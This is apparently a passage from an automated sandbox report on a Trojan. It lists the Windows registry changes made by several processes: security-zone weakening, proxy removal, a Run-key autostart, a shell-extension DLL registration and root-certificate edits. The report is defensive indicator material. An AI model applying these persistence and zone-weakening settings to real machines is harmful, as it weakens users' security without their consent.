"Seed" = "EB C0 45 22 1E 9D 7B 43 9E B3 E3 26 49 49 C8 76"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"On" = "0"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Wuji\DEBUG]
"Trace Level" = ""

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Wuji\DEBUG]
"Trace Level"

The process FhCalendar.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 49 09 89 D2 FF E1 F4 98 54 56 A4 80 9E BA 49"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fhrl]
"update.exe" = "Update 应用程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process FhCalendar.exe:588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "FhCalendar.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1402636056"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 35 70 F7 CB 16 DA C6 8E 5B CD E0 CF CD 6F 2A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wujiime.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"DisplayVersion" = "3.6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\VERSION]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"Publisher" = "Wuji"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"UninstallString" = "%Program Files%\Wuji\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}]
"(Default)" = "pIContextMenu.ShellExt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"ver" = "3.6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\ProgID]
"(Default)" = "pIContextMenu.ShellExt"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\0\win32]
"(Default)" = "%System%\catsrvuz.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"URLInfoAbout" = "Wj"

[HKCR\Directory\Background\shellex\ContextMenuHandlers\with]
"(Default)" = "{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\InprocServer32]
"(Default)" = "%System%\catsrvuz.dll"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0]
"(Default)" = "IContextMenu wj"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\TypeLib]
"(Default)" = "{42E245AA-0C25-428F-98FA-55DC9CA83E6D}"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}]
"(Default)" = "_ShellExt"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\pIContextMenu.ShellExt\Clsid]
"(Default)" = "{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 A2 42 55 B5 34 36 CF C2 A6 05 52 4A B4 70 68"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"DisplayName" = "无极输入法 3.6"

[HKCU\Software\VB and VBA Program Settings\jcity\tj]
"nt" = "55"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\TypeLib]
"(Default)" = "{42E245AA-0C25-428F-98FA-55DC9CA83E6D}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"

[HKCR\pIContextMenu.ShellExt]
"(Default)" = "pIContextMenu.ShellExt"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process MSIB.tmp:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 5B 7B 66 1D D9 48 61 68 AD 61 12 39 C3 6E 86"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\xxdd]
"SportLive.exe" = "直播中心"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process xxdd_165.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 12 9D AB 46 B0 B5 90 35 C3 17 34 CC 48 AC 4B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process updroots.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0E31CAD006F39C735CFF0FF9DDA41A52E9D0FD22]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 71 72 94 D7"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
"Blob" = "19 00 00 00 01 00 00 00 10 00 00 00 D8 B5 FB 36"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"0E31CAD006F39C735CFF0FF9DDA41A52E9D0FD22"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
"File"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5"

The process 114gglm_016.exe:488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 59 8D 28 D9 17 87 C6 FB 54 26 9D 38 F0 38 15"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"file" = "114gglm_016"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"ver" = "3.6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wjime" = "%Program Files%\Wuji\Wuji.exe auto"

The process Update.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 55 5A 20 7D FB DF 55 8B 27 30 96 FA A1 F4 48"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process fhrl_6_12001.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\thyz\FhCalendar.exe]
"(Default)" = "%Program Files%\fhrl\FhCalendar.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"DisplayName" = "·çºÍÈÕÀú 1.00.001"
"DisplayVersion" = "1.00.001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"UninstallString" = "%Program Files%\fhrl\Fhuninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"URLInfoAbout" = "http://www.fhrlw.com"
"DisplayIcon" = "%Program Files%\fhrl\FhCalendar.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"Publisher" = "Ìƺ²Ò×ÕßÐÅÏ¢¼¼ÊõÓÐÏÞ¹«Ë¾"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 7F ED 19 00 E5 EE 7D 60 1D 7F 38 E2 5F C3 9F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The process fhsli_6_12001.exe:1852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 04 CF D3 52 C8 23 F1 5E 97 A3 33 40 02 19 D1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process netsh.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

